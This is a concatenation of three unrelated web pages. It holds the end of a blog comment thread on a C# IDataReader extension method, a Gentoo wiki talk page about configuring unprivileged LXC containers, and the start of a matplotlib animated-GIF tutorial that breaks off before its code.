this.ReadColumn(i);
return this._data[i].Double;
}
The _data array is a collection of SqlBuffer.
When the reader is being populated its try to use the exact type like Double, Int32, Bool.
In most cases there will be no casting in this method, but sometimes there will be. Note SqlBuufer inherit object so its always a ref type.
In my extension method, I always use casting.
The difference is you only need to parse the filedName and not the ordinal index.
Hi,
Thanks for this article.
Here is my approach without using ordinal and manage DBNull values : blog.sb2.fr/…/IDataReader-Extension-Method-GetValue3cT3e.aspx
Hi Yoann, thanks for the replay.
I think you should considure in your approach that the user should know when the data returns as DBNull and not return as the defaule accessor value.
Anyway that may approach, just keep the natural code. | http://blogs.microsoft.co.il/giladlavian/2008/11/17/extension-methods-idatareadergetvaluelttgt/ | CC-MAIN-2018-22 | en | refinedweb |
Talk:LXC
Unprivileged containers section confusing
the section about unprivileged containers is confusing, the author creates an "lxc" user and adds subuids/subgids for that user but in fact it seems he's creating/starting the container from a root prompt...
if there's no needs to give a user permissions to create/start containers, you don't need to create any lxc user in order to create/start an unprivileged container.
all what you need to do is to create subuids/subgids for the root user, add lxc.id_map parameters to container's config and create/start the container as root.
moreover, using subuids/subgids 100000-165536 didn't work on my hardened box, but 10000-65536 did. — The preceding unsigned comment was added by Skunk (talk • contribs) 22 February 2016
- Answer - right. With latest edit - this issue are fixed — The preceding unsigned comment was added by Feniksa (talk • contribs) September 12, 2016
Is "MAJOR temporary problems with LXC" section still needed?
From what I understand from the linked page, user namespaces are now fully implemented and unprivileged containers are now safe. Couldn't we replace this section with a short description of privileged and unprivileged containers?
Vdupras (talk) 15:27, 8 December 2017 (UTC)
cgmanager deprecated
The cgmanager has become deprecated (see). It is also not working anymore with current systemd builds: As workaround the use of the pam module which ships with LXCFS is suggested, but it looks like this does not work with the current cbuilds of gentoo.
configuration files outdated
The configuration options on this page are outdated as of lxc 2.1.1 | https://wiki.gentoo.org/wiki/Talk:LXC | CC-MAIN-2018-22 | en | refinedweb |
Some Python libraries and snippets
There are a bunch of standard and third-party Python libraries that are useful, but rarely used by beginners and even intermediate users of Python. This post highlights a few of my favourite libraries and gives practical demonstrations of some functionality. I intend this post to remain 'alive' -- i.e. I'll keep adding libraries and code snippets as I discover them.
inspect (standard library)
I developed in Python for many years before I first used the
inspect library, but now I often use it. I find it useful to access the stack and to get the source code of functions.
A basic Python loggerA basic Python logger
The Python
logging library is really nice and full-featured, and in nearly all cases you should be using it (or another logging library). As a quick-and-dirty alternative, let's see how easy it is to log an error message along with the date and time and the function name that threw the error.
import inspect # gives us access to the stack from datetime import datetime LOG = True # set to False to suppress output def log(message): """Log message with datetime and function name""" if LOG: n = datetime.utcnow() f = inspect.stack()[1][3] print("{} - {}: {}".format(n, f, message)) def problem_function(): """Trigger Exception and log result""" try: lst = [1,2,3] idx = 4 return lst[idx] except IndexError: log("Couldn't get element {} from {}".format(idx, lst)) def call_problem_function(): """Call problem function""" return problem_function() def main(): call_problem_function() if __name__ == "__main__": main()
In the above contrived example, we have a
problem_function that needs to log output of what went wrong. Instead of simply printing the result, we define a simple
log function. This:
- Checks to see if we want output (if the
LOGglobal is set to
True)
- Prints out the custom message along with the name of the function that caused it and the current time
We can access the stack of function calls using
inspect.stack() We grab the second element off it (
inspect.stack()[1]) as the first one will always be the
log function itself, while one further back will the function that called
log(). We get the second item (
inspect.stack()[1][3]) as this is the name of the function.
So-called "print debugging" is definitely not best practice, and there normally better ways, but most people are guilty of using it and it's often useful. Sometimes adding some information from the stack makes it much easier to work out exactly what's going wrong with your code.
TextBlob (third party library)TextBlob (third party library)
Perhaps the best-known library for Natural Language Processing (NLP) in Python in
NLTK. I am not a huge fan of
NLTK. Another nice library is
Spacy, which addresses many of the issues with
NLTK. However, Spacy is much more modern and still lacks some functionality. It's also pretty resource intensive, and slow to initialise (which is frustrating for prototyping).
Another nice library is for NLP is
Pattern, but this only available for Python 2.
TextBlob is built on top of both NLTK and Pattern (but it works for Python 3). I find it is sometimes a nice compromise between simplicity and functionality. It turns strings of language into 'blobs', and you can easily perform common operations on these. For example:
from textblob import TextBlob negative_sentence = "I hated today" positive_sentence = "Had a wonderful time with my goose, my child, and my fish" neutral_sentence = "Today was a day" # sentiment analysis neg_blob = TextBlob(negative_sentence) pos_blob = TextBlob(positive_sentence) neu_blob = TextBlob(neutral_sentence) print(neg_blob.sentiment) print(pos_blob.sentiment) print(neu_blob.sentiment) # output # >>>Sentiment(polarity=-0.9, subjectivity=0.7) # >>>Sentiment(polarity=1.0, subjectivity=1.0) # >>>Sentiment(polarity=0.0, subjectivity=0.0) # pluralization print("{}->{}".format(pos_blob.words[6], pos_blob.words[6].pluralize())) print("{}->{}".format(pos_blob.words[7], pos_blob.words[7].pluralize())) print("{}->{}".format(pos_blob.words[8], pos_blob.words[8].pluralize())) print("{}->{}".format(pos_blob.words[-1], pos_blob.words[-1].pluralize())) # output # >>>goose->geese # >>>my->our # >>>child->children # >>>fish->fish # Parts of Speech (POS) tagging print(pos_blob.tags) # ouput # >>> [('Had', 'VBD'), ('a', 'DT'), ('wonderful', 'JJ'), ('time', 'NN'), ('with', 'IN') ('my', 'PRP$'), ('goose', 'NN'), ('my', 'PRP$'), ('child', 'NN'), ('and', 'CC'), ('my', 'PRP$'), ('fish', 'NN')] nouns = ' '.join([tag[0] for tag in pos_blob.tags if tag[1] == "NN"]) print(nouns) # ouput #>>> 'time goose child fish'
We can see that it can identify positive and negative sentiment pretty well. In TextBlob sentiment analysis consists of two parts: polarity (which is how positive or negative the sentiment is), and subjectivity (which is how opinionated the sentence is). I find the subjectivity score less useful and less accurate, and usually use only the polarity. The sentiment is simply a named tuple, so you can access on the polarity with
neg_blob.sentiment[0], for example.
It also handles pluralisation of nouns pretty well, and can change
goose to
geese, etc. It isn't perfect (e.g.
pants becomes
pantss) but it's the simplest solution I found to pluralisation that works most of the time.
To get POS tags, we access the
tags attribute, so we can easily extract all the nouns from a sentence, for example.
ConclusionConclusion
I've only added a couple of libraries and examples for now, but this post will keep growing. If there's anything that you feel should be included, feel free to comment below or tweet @sixhobbits and I'll consider adding it. | https://www.codementor.io/garethdwyer/some-python-libraries-and-snippets-4vac5rlus | CC-MAIN-2018-22 | en | refinedweb |
May 30, 2013 05:56 AM|Bala1988|LINK
Dear all
I need to new country master in the classifieds application , how we do that . when i review the location master i noticed as namespace called LocationsDataComponentTableAdapters how i create the one for country master
classified countrymaster
0 replies
Last post May 30, 2013 05:56 AM by Bala1988 | https://forums.asp.net/t/1910496.aspx?Adding+country+master+in+admin+settings | CC-MAIN-2018-22 | en | refinedweb |
NetDfsRemoveFtRoot function
Removes the specified root target from a domain-based Distributed File System (DFS) namespace. If the last root target of the DFS namespace is being removed, the function also deletes the DFS namespace. A DFS namespace can be deleted without first deleting all the links in it.
Syntax
Parameters
- ServerName [in]
Pointer to a string that specifies the server name of the root target to be removed. The server must host the root of a domain-based DFS namespace. This parameter is required.
- RootShare [in]
Pointer to a string that specifies the name of the DFS root target share to be removed. This parameter is required.
- FtDfsName [in]
Pointer to a string that specifies the name of the domain-based DFS namespace from which to remove the root target. This parameter is required. Typically, it is the same as the RootShare parameter.
- Flags
This parameter is reserved and must be zero.
Return value
If the function succeeds, the return value is NERR_Success.
If the function fails, the return value is a system error code. For a list of error codes, see System Error Codes.
Remarks
The root target server must be available and accessible; otherwise, the call to the NetDfsRemoveFtRoot function will fail.
The caller must have permission to update the DFS container in the directory service and must have Administrator privilege on the DFS host (root) server.
Requirements
See also
- Network Management Overview
- Network Management Functions
- Distributed File System (DFS) Functions
- NetDfsAddFtRoot
- NetDfsRemoveFtRootForced
- NetDfsRemove | https://msdn.microsoft.com/en-us/library/bb524818(v=vs.85).aspx | CC-MAIN-2018-22 | en | refinedweb |
my
3. partiotioner
if all this gets done in 15 mins then reducer has the simple task of
1. grouping comparator
2. reducer itself (simply output records)
should take less time than mappers .. instead it essentially gets stuck in
reduce phase .. im gonna paste my code here to see if anything stands out
as a fundamental design issue
//////PARTITIONER
public int getPartition(Text key, HCatRecord record, int numReduceTasks) {
//extract the group key from composite key
String groupKey = key.toString().split("\\|")[0];
return (groupKey.hashCode() & Integer.MAX_VALUE) % numReduceTasks;
}
////////////GROUP COMAPRATOR
public
>> >> >>
>> >> >
>> >
>> >
>>
>
> | http://mail-archives.apache.org/mod_mbox/hadoop-mapreduce-user/201308.mbox/%3CCAH1YrM62QTM1JYCuLmMuLF4DAcW+Z0HZn1NGP=282_LxwAqDAA@mail.gmail.com%3E | CC-MAIN-2018-34 | en | refinedweb |
In particular, the Java 5 release (JDK 1.5) marked a significant change, and noticeably altered (and improved) the character of typical Java code. When updating old code to more recent versions of Java, it's helpful to use a quick checklist of things to look out for. Here's a list of such items related to the Java 5 release:
Use @Override liberally
The
@Override standard annotation identifies methods that override a superclass method.
It should be used liberally to indicate your intent to override.
It's also used when implementing methods defined by an interface.
Avoid raw types
Raw types should almost always be avoided in favor of parameterized types.
Use for-each loops
The enhanced for loop (also called the for-each loop) should be used whenever available. It's more compact, concise, and clear.
Replace constants with enumerations
Using
public static final constants to represent sets of related items should be avoided in favor of the enumerations now supported by Java.
In addition, you should consider replacing any "roll-your-own" implementations of type-safe enumerations with the new language construct.
Replace
StringBuffer with
StringBuilder
The older
StringBuffer class is thread-safe, while the new
StringBuilder is not.
However, it's almost always used in a context in which thread safety is superfluous.
Hence, the extra cost of synchronization is paid without benefit.
Although the performance improvement in moving from
StringBuffer to
StringBuilder may only be very slight (or perhaps not even measurable), it's generally considered better form to prefer
StringBuilder.
Use sequence parameters when appropriate
Sequence parameters (varargs) let you replace
Object[] parameters (containing 0..N items) appearing at the end of a parameter list with an alternate form more convenient for the caller.
For example,
public static void main(String[] aArgs){}can now be replaced with:
public static void main(String... aArgs){}
Be careful with Comparable
The
Comparable interface has been made generic.
For example,
class Anatomy implements Comparable{ public int compareTo(Object aThat){} }should now be replaced with :
class Anatomy implements Comparable<Anatomy>{ public int compareTo(Anatomy aThat){} }
Example
Here's an example of code written using Java 5 features:
import java.util.*; public final class Office { /** * Use sequence parameter (varargs) for main method. * * Use a sequence parameter whenever array parameter appears at * the END of the parameter list, and represents 0..N items. */ public static void main(String... aArgs){ //Use parameterized type 'List<String>', not the raw type 'List' List<String> employees = Arrays.asList("Tom", "Fiorella", "Pedro"); Office office = new Office(AirConditioning.OFF, employees); System.out.println(office); //prefer the for-each style of loop for(String workingStiff: employees){ System.out.println(workingStiff); } } /** * Preferred : use enumerations, not int or String constants. */ enum AirConditioning {OFF, LOW, MEDIUM, HIGH} /* * Definitely NOT the preferred style : */ public static final int OFF = 1; public static final int LOW = 2; public static final int MEDIUM = 3; public static final int HIGH = 4; Office(AirConditioning aAirConditioning, List<String> aEmployees){ fAirConditioning = aAirConditioning; fEmployees = aEmployees; //(no defensive copy here) } AirConditioning getAirConditioning(){ return fAirConditioning; } List<String> getEmployees(){ return fEmployees; } /* * Get used to typing @Override for toString, equals, and hashCode : */ @Override public String toString(){ //..elided } @Override public boolean equals(Object aThat){ //..elided } @Override public int hashCode(){ //..elided } // PRIVATE // private final List<String> fEmployees; private final AirConditioning fAirConditioning; }
JDK 7 also has some new tools which improve the character of typical Java code:
Use 'diamond' syntax for generic declarations
Declarations of the form:
List<String> blah = new ArrayList<String>(); Map<String, String> blah = new LinkedHashMap<String, String>();can now be replaced with a more concise syntax:
List<String> blah = new ArrayList<>(); Map<String, String> blah = new LinkedHashMap<>();
Use try-with-resources
The try-with-resources feature lets you eliminate most finally blocks in your code.
Use Path and Files for basic input/output
The new java.nio package is a large improvement over the older File API.
Objects()); } } | http://www.javapractices.com/topic/TopicAction.do;jsessionid=CEDFF473CD05E0DC9866625E87331870?Id=225 | CC-MAIN-2018-34 | en | refinedweb |
This class is deprecated. More...
#include <XercesBridgeHelper.hpp>
This class is deprecated.
Definition at line 60 of file XercesBridgeHelper.hpp.
Definition at line 64 of file XercesBridgeHelper.hpp.
Definition at line 67 of file XercesBridgeHelper.hpp.
Interpreting class diagrams
Doxygen and GraphViz are used to generate this API documentation from the Xalan-C header files. | http://xalan.apache.org/xalan-c/apiDocs/classXercesBridgeHelper.html | CC-MAIN-2018-34 | en | refinedweb |
NameNotFoundException: DefaultDS not bound - Entity Unit (CaHelen Tran Feb 7, 2007 1:51 AM
Hi All,
I have not been able to bind the default Hypersonic database (DefaultDS) in JBoss after having created a simple Entity class (Cabin) and a Persistent Unit (titanPU). Below is the listing from JBoss output:
---------------------------------------------------------------------------------------
17:03:12,109 INFO [JmxKernelAbstraction] installing MBean: jboss.j2ee:jar=titan.jar,name=TravelAgentBean,service=EJB3 with dependencies:
17:03:12,125 INFO [JmxKernelAbstraction] persistence.units:unitName=titan
17:03:12,156 INFO [EJB3Deployer] Deployed: file:/C:/jboss-4.0.4.GA/server/default/deploy/titan.jar
17:03:12,500 INFO [TomcatDeployer] deploy, ctxPath=/jmx-console, warUrl=.../deploy/jmx-console.war/
17:03:14,125 ERROR [URLDeploymentScanner] Incomplete Deployment listing:
--- MBeans waiting for other MBeans ---
ObjectName: persistence.units:jar=titan.jar,unitName=titanPU
State: FAILED
Reason: javax.naming.NameNotFoundException: DefaultDS not bound
I Depend On:
jboss.jca:service=ManagedConnectionFactory,name=DefaultDS
ObjectName: jboss.j2ee:jar=titan.jar,name=TravelAgentBean,service=EJB3
State: NOTYETINSTALLED
I Depend On:
persistence.units:unitName=titan
--- MBEANS THAT ARE THE ROOT CAUSE OF THE PROBLEM ---
ObjectName: persistence.units:unitName=titan
State: NOTYETINSTALLED
Depends On Me:
jboss.j2ee:jar=titan.jar,name=TravelAgentBean,service=EJB3
ObjectName: persistence.units:jar=titan.jar,unitName=titanPU
State: FAILED
Reason: javax.naming.NameNotFoundException: DefaultDS not bound
I Depend On:
jboss.jca:service=ManagedConnectionFactory,name=DefaultDS
---------------------------------------------------------------------------------------
I do not have any difficulty creating the same EJB (Entity class - Cabin, Entity Unit - titan, Session bean - TravelAgent) using the supplied Ant script (build.xml) provided as part of EJB 3.0 Resource Workbook.
Here is a comparison between the persistence.xml file that came with the exercise and the one produced by Netbeans:
--------------------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8" ?>
-
- <persistence-unit
<jta-data-source>java:/DefaultDS</jta-data-source>
-
</persistence-unit>
################################################
<persistence version="1.0" xmlns="" xmlns:
<persistence-unit
org.hibernate.ejb.HibernatePersistence
<jta-data-source>DefaultDS</jta-data-source>
</persistence-unit>
-------------------------------------------------------------------------------------
Numerous searches on Google and forums have not been fruitful.
I am running Netbeans 5.5 bundled with JBoss 4.0.4 on Windows 2000/XP.
Many thanks,
Henry
1. Re: NameNotFoundException: DefaultDS not bound - Entity UnitLibor Kotouc Feb 7, 2007 4:21 AM (in response to Helen Tran)
Try to replace 'DefaultDS' by 'java:/DefaultDS' in persistence.xml.
2. Re: NameNotFoundException: DefaultDS not bound - Entity UnitHelen Tran Feb 7, 2007 5:16 PM (in response to Helen Tran)
Hi L,
By prepending the "java:/" to DefaultDS in persistence.xml file did fixed the binding issue. I have tried this in the past but did not redeploy correctly. Anyhow, I now receive the following error when running the Client.java on the titan.jar EJ client.Client.main(Client.java:31)
Here is the code for Client.java:
package client;
import travelagent.TravelAgentRemote;
import domain.Cabin;
import java.util.Properties;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.rmi.PortableRemoteObject;
public class Client { public static void main(String [] args) { try { Context ctx = getInitialContext(); Object ref = (TravelAgentRemote) ctx.lookup("TravelAgentRemote"); TravelAgentRemote dao = (TravelAgentRemote) PortableRemoteObject.narrow(ref,TravelAgentRemote.class); Cabin cabin_1 = new Cabin(); cabin_1.setId(1); cabin_1.setName("Master Suite"); cabin_1.setDeckLevel(1); cabin_1.setShipId(1); cabin_1.setBedCount(3); dao.createCabin(cabin_1); Cabin cabin_2 = dao.findCabin(1); System.out.println(cabin_2.getName()); System.out.println(cabin_2.getDeckLevel()); System.out.println(cabin_2.getShipId()); System.out.println(cabin_2.getBedCount()); } catch (javax.naming.NamingException ne) { ne.printStackTrace(); } } public static Context getInitialContext() throws javax.naming.NamingException { return new javax.naming.InitialContext(); } }
Thanks again,
Henry
3. Re: NameNotFoundException: DefaultDS not bound - Entity UnitLibor Kotouc Feb 8, 2007 8:52 AM (in response to Helen Tran)
You must initialize the context environment. The following code works with JBoss AS 4 (EJB2.1 module is deployed):
package accessejb;
import a.AccessibleSessionRemote;
import a.AccessibleSessionRemoteHome;
import java.util.Hashtable;
import javax.naming.InitialContext;
import javax.rmi.PortableRemoteObject;
public class Main {
public static void main(String[] args) throws Exception {
AccessibleSessionRemote asr = lookupAccessibleSessionBean();
String msg = asr.hello("World");
System.out.println(msg);
}
private static AccessibleSessionRemote lookupAccessibleSessionBean() throws Exception {
Object remote = getContext().lookup("AccessibleSessionBean");
AccessibleSessionRemoteHome rv = (AccessibleSessionRemoteHome) PortableRemoteObject.narrow(remote, AccessibleSessionRemoteHome.class);
return rv.create();
}
private static InitialContext getContext() throws Exception {
Hashtable<String, String> env = new Hashtable<String, String>();
env.put("java.naming.factory.initial", "org.jnp.interfaces.NamingContextFactory");
env.put("java.naming.provider.url", "jnp://localhost:1099");
return new InitialContext(env);
}
}
Remote interface: a.AccessibleSessionRemote
Home interface: a.AccessibleSessionRemoteHome
The home interface is bound to 'AccessibleSessionBean' name.
Following libraries must be on the classpath:
/client/jboss-j2ee.jar
/client/jbossall-client.jar
/server/default/lib/jnpserver.jar
/lib/jboss-common.jar
4. Re: NameNotFoundException: DefaultDS not bound - Entity UnitLibor Kotouc Feb 8, 2007 8:54 AM (in response to Helen Tran)
[should have been in the previous reply]
/client/jboss-j2ee.jar
/client/jbossall-client.jar
/server/default/lib/jnpserver.jar
/lib/jboss-common.jar
5. Re: NameNotFoundException: DefaultDS not bound - Entity UnitLibor Kotouc Feb 8, 2007 8:55 AM (in response to Helen Tran)
[server]/client/jboss-j2ee.jar
[server]/client/jbossall-client.jar
[server]/server/default/lib/jnpserver.jar
[server]/lib/jboss-common.jar
6. Re: NameNotFoundException: DefaultDS not bound - Entity UnitHelen Tran Feb 8, 2007 2:28 PM (in response to Helen Tran)
Hi L,
Thanks for your suggestion and I will try to modify these EJB 2.1 syntax for my EJB 3.0 issue. However, I have the following questions:
( i ) The code used was the same one that I have successfully compiled using the build.xml supplied as part of the EJB 3.0 Workbook (Bill Burke) on the command prompt. This means that it should not need further tampering/customisation to make it work. The only difference in this case is that I have used Netbeans to create this EJB that appears to have difficulty deploying properly. Received the following message when deploying the titan EJB using Netbeans to JBoss:
06:16:28,187 INFO [TomcatDeployer] deploy, ctxPath=/jmx-console, warUrl=.../deploy/jmx-console.war/
06:16:29,250 ERROR [URLDeploymentScanner] Incomplete Deployment listing:
--- Incompletely deployed packages ---
org.jboss.deployment.DeploymentInfo@62fe5342 { url=file:/C:/jboss-4.0.4.GA/server/default/deploy/titan.jar }
deployer: MBeanProxyExt[jboss.ejb3:service=EJB3Deployer]
status: Deployment FAILED reason: Trying to install an already registered mbean: jboss.system:service=ThreadPool
state: FAILED
watch: file:/C:/jboss-4.0.4.GA/server/default/deploy/titan.jar
altDD: null
lastDeployed: 1170962187656
lastModified: 1170962187312
mbeans:
No Cabin table has been created either.
( ii ) Could anyone assist me in translating those EJB 2.1 statements to EJB 3.0 since I am very new to EJB 3.0 and does not have a clue how EJB 2.1 work.
I will read up some Netbeans user guide/cheat sheet to ensure that the titan EJB is created properly, even though it is a very straight forward step.
Lastly, is it possible that I could not have both Glassfish (ASJS 9.0) & JBoss AS 4.0.4 co-existing on the same Windows XP platform?
I do appreciate very much for you helping me out on this issue.
Thanks,
Henry
7. Re: NameNotFoundException: DefaultDS not bound - Entity UnitLibor Kotouc Feb 10, 2007 7:53 AM (in response to Helen Tran)
The main problem results from inability to initialize the context, see the exception:
>Need to specify class name in environment or system property: java.naming.factory.initial
Some properties must be set prior to creation of InitialContext instance. The other way of setting the properties is to provide jndi.properties file along with your client code.
BTW, are you sure that the deployment exception comes from your jar? I am not sure about the meaning of the reason of the deployment failure:
>Trying to install an already registered mbean: jboss.system:service=ThreadPool
Does it appear even if you don't deploy your jar? If it does, the reason is not in your jar. If it doesn't, try to deploy as simple EJB module as possible (e.g. with one stateless session bean only) and modify/deploy it (to get the EJB module you use now) until the exception appears. This way you'll identify the problem.
Generally, get rid of the deployment exception first and then set the environment properties to initialize the context in the client code.
8. Re: NameNotFoundException: DefaultDS not bound - Entity UnitHelen Tran Feb 12, 2007 9:13 PM (in response to Helen Tran)
Hi L,
Success at last after having upgraded JBoss to 4.0.5 (full support for EJB 3.0) which may have fixed the problem. Anyhow the main sticking point was not referencing TravelAgentBean correctly using JNDI. Below is the only slight modification needed from the original code from the Client:
Context ctx = getInitialContext(); Object ref = (TravelAgentRemote) ctx.lookup("TravelAgentBean/remote"); TravelAgentRemote dao = (TravelAgentRemote) PortableRemoteObject.narrow(ref,TravelAgentRemote.class);
or
InitialContext ctx = new InitialContext(); TravelAgentRemote dao = (TravelAgentRemote) ctx.lookup("TravelAgentBean/remote");
No need for any JNDI bootstraping properties as in EJB 2.1 or earlier.
Likewise, I didn't need these libraries in the Client's classpath either:
/client/jboss-j2ee.jar
/client/jbossall-client.jar
/server/default/lib/jnpserver.jar
/lib/jboss-common.jar.
I also learnt a lot on creating EJB using Netbeans & JBoss to lookup JNDI that was largely my problem.
Again a Big thank you for all your suggestions,
Henry | https://developer.jboss.org/message/446632 | CC-MAIN-2018-34 | en | refinedweb |
This weblog is a step by step guide to creating a namespace filter for your KM repostiory.
Step 1
Create a empty portal project using wizard inside NWDS
Step 2
Select the project that was created above and using KM wizard to create the KM namespace filter.
Step 3
Open up your java file for filter. In my case it is ExcludeTemp.java. It should look following.
Step 4
Now, you need to modify the method filter(). This is where you code to hide certain files/folder by looking at their name. In my case i am hiding files with certain file extension (.back, .tmp, … )
Step 5
Deploy your component to your portal and assign it the repository that needs to be filtered
Step 6
The changes in above step should affect the KM immediately but if it doesn’t then restart your portal.
BAM!!! You got yourself a namespace filter
Please help me in this regard.
Kindly give some solution.
Thanks in Advance,
With Regards,
Venkatesh.K. | https://blogs.sap.com/2005/10/17/how-to-create-namespace-filter-for-km/ | CC-MAIN-2018-34 | en | refinedweb |
Cameron Beattie wrote:
def main(): urllib._urlopener = MyUrlOpener() url = "%s/Control_Panel/Database/manage_pack?days:float=%s" % \
Advertising
*sigh* url whacking, bleugh!
If I use the backup user then urllib can't get the url due to no authentication so errors as follows:
What roles do you want to have the backup user to have? What permissions are mapped to those roles? What permissions are mapped to the Owner role? Looking at the differences will tell you what's going on ;-)
PS: I wouldn't do zodb packing by whacking a url. There's a script that scripts with ZOpe now that opens up a ZEO connection and does the pack that way, that's what I'd do...I don't use ZEO - can I just do the scripted packing bit without all the associated ZEO setup?
You should use ZEO! there's no sane reason not to... Chris -- Simplistix - Content Management, Zope & Python Consulting - _______________________________________________ Zope maillist - [email protected] ** No cross posts or HTML encoding! **(Related lists - ) | https://www.mail-archive.com/[email protected]/msg19480.html | CC-MAIN-2018-34 | en | refinedweb |
If you’ve built a form in a NativeScript app you’ve probably had the need to show an activity indicator during submission. In this article we’ll look at how to do that by building the example you see in the gif below.
NOTE: You can check out this article’s code in NativeScript Playground.
NOTE: You can check out this article’s code in NativeScript Playground.
Let’s start by looking at the NativeScript control for making these sort of UIs possible—ActivityIndicator.
NativeScript’s ActivityIndicator component is a really simple UI control for showing a spinner. The ActivityIndicator works like any other NativeScript UI control, meaning, you can use NativeScript’s layouts to place the ActivityIndicator anywhere you’d like in your app’s screens.
For example, the following stacks a number of ActivityIndicators on the screen.
<StackLayout>
<ActivityIndicator color="green" busy="true"></ActivityIndicator>
<ActivityIndicator color="blue" busy="true"></ActivityIndicator>
<ActivityIndicator color="red" busy="true"></ActivityIndicator>
<ActivityIndicator color="orange" busy="true"></ActivityIndicator>
<ActivityIndicator color="purple" busy="true"></ActivityIndicator>
</StackLayout>
Here’s what that looks like on a device.
The ability to position the ActivityIndicator is important, as normally you want to show the spinner at a very specific part of the screen.
For the purpose of this article, let’s suppose that you’re building a login the uses the following markup.
<StackLayout class="input-field">
<TextField class="input" hint="Email"></TextField>
</StackLayout>
<StackLayout class="input-field">
<TextField class="input" hint="Password"></TextField>
</StackLayout>
<Button class="btn btn-primary" text="Submit"></Button>
With a bit of CSS that markup looks like this on a device.
There are a few different places you could choose to show an ActivityIndicator on a form like this, but for this article we’ll center the ActivityIndicator directly in the middle of the login form.
The code below alters the previous example to surround the UI with a parent <GridLayout>, and adds an ActivityIndicator that spans the dimensions of that new parent layout.
<GridLayout>
<GridLayout rows="auto, auto, auto">
<StackLayout row="0" class="input-field">
<TextField class="input" hint="Email"></TextField>
</StackLayout>
<StackLayout row="1" class="input-field">
<TextField class="input" hint="Password"></TextField>
</StackLayout>
<Button row="2" class="btn btn-primary" text="Submit"></Button>
<ActivityIndicator rowSpan="3" busy="true"></ActivityIndicator>
</GridLayout>
With this approach your form fields take up exactly the same dimensions they did before, however, they now have a parent <GridLayout> container that you can use to position the <ActivityIndicator>. The end result looks like this.
<ActivityIndicator>
Feel free to change the position of your ActivityIndicator depending on the needs of your apps. When you’re ready, let’s look at how to bind to an ActivityIndicator’s busy attribute, and how to disable form controls during submission.
busy
TIP: Need help mastering NativeScript layouts? Try the interactive tutorials on nslayouts.com.
TIP: Need help mastering NativeScript layouts? Try the interactive tutorials on nslayouts.com.
Allowing users to mess with a form during submission is not a good idea. You stand a good chance of confusing your users, and you might even screw up your backend by sending multiple simultaneous requests.
Luckily, NativeScript’s form controls have an easy-to-use isEnabled attribute to make shutting down your form relatively easy.
isEnabled
To start implementing this, you first need to create a variable to track whether a request to your backend is in progress. For example, in an Angular app you might want to use the processing instance variable in the code below. Notice how the variable is set to false by default, and set to true right before you initiate your backend processing.
processing
false
true
import { Component } from "@angular/core";
@Component({
selector: "app-login",
...
})
export class LoginComponent {
processing = false;
submit() {
this.processing = true;
callMyBackendService()
.then(() => {
this.processing = false;
// Handle response
})
}
}
The idea behind creating a variable like processing is it gives you a value you can bind each component’s isEnabled attribute to, as well the <ActivityIndicator>’s busy attribute. For example, here’s how you can accomplish that in an Angular app.
<GridLayout rows="auto, auto, auto">
<StackLayout row="0" class="input-field">
<TextField [isEnabled]="!processing" class="input" hint="Email"></TextField>
</StackLayout>
<StackLayout row="1" class="input-field">
<TextField [isEnabled]="!processing" class="input" hint="Password"></TextField>
</StackLayout>
<Button row="2" [isEnabled]="!processing" class="btn btn-primary" text="Submit"></Button>
<ActivityIndicator [busy]="processing" rowSpan="3"></ActivityIndicator>
</GridLayout>
With these changes in place your form now looks like this.
As a final step, NativeScript provides a :disabled CSS selector for you to style disabled form controls. You’re welcome to customize your apps as much as you’d like, but oftentimes bumping down the opacity is enough to visibly show that a control is disabled.
:disabled
opacity
:disabled {
opacity: 0.5;
}
With that, your form now adds a little bit of opacity whenever submissions are in progress.
And if you add in some login form functionality from a previous article on this blog, you end up with the final state of this example.
As a reminder, the full source code for this example is available on NativeScript Playground. If you run into problems using this code, or have any other tips & tricks related to activity indicators you’d like to share, feel free to post them in the comments.
(expect a newsletter every 4-8 weeks) | https://www.nativescript.org/blog/showing-an-activity-indicator-during-processing-in-nativescript-apps | CC-MAIN-2018-34 | en | refinedweb |
In order to be able to do something useful with the output of a Dumbo program, you often need to index it first. Suppose, for instance, that you ran a program that computes JIRA issue recommendations on lots and lots of issues, saving the output to jira/recs on the DFS. If the HADOOP-1722 patch has been applied to your Hadoop build, you can then dump this output to a fairly compact typed bytes file recs.tb as follows:
$ /path/to/hadoop/bin/hadoop jar \ /path/to/hadoop/build/contrib/streaming/*.jar dumptb jira/recs > recs.tb
Such a typed bytes file isn’t very convenient for doing lookups though, since you basically have to go through the whole thing to find the recommendations corresponding to a particular issue. Keeping it completely in memory as a hash table might be an option if you have tons of RAM, but indexing it and putting only the index in memory can do the trick as well.
Here’s a very simple, but nevertheless quite effective, way of generating an index for a typed bytes file:
import sys import typedbytes infile = open(sys.argv[1], "rb") outfile = open(sys.argv[2], "wb") input = typedbytes.PairedInput(infile) output = typedbytes.PairedOutput(outfile) pos = 0 for key, value in input: output.write((key, pos)) pos = infile.tell() infile.close() outfile.close()
This Python program relies on the typedbytes module to read a given typed bytes file and generate a second one containing (key, position) pairs. More concretely, running it with the arguments recs.tb recs.tb.idx leads to an index file recs.tb.idx for recs.tb. If you put
file = open("recs.tb") input = typedbytes.PairedInput(file) index = dict(typedbytes.PairedInput(open("recs.tb.idx")))
in the initialization part of a Python program, you can then lookup the recommendations for a particular issuenr as follows:
file.seek(index[issuenr]) readnr, recs = input.read() if readnr != issuenr: raise ValueError("corrupt index")
When dealing with huge output files, you might have to use a second-level index on (a sorted version of) the index obtained in this way, but in many cases this simple approach gets the job done just fine. | https://dumbotics.com/tag/indexing/ | CC-MAIN-2019-22 | en | refinedweb |
This is a brief post on how to draw animated GIFs with Python using matplotlib. I tried the code shown here on a Ubuntu machine with ImageMagick installed. ImageMagick is required for matplotlib to render animated GIFs with the save method.
Here's a sample animated graph:
A couple of things to note:
- The scatter part of the graph is unchanging; the line is changing.
- The X axis title is changing in each frame.
Here's the code that produces the above:
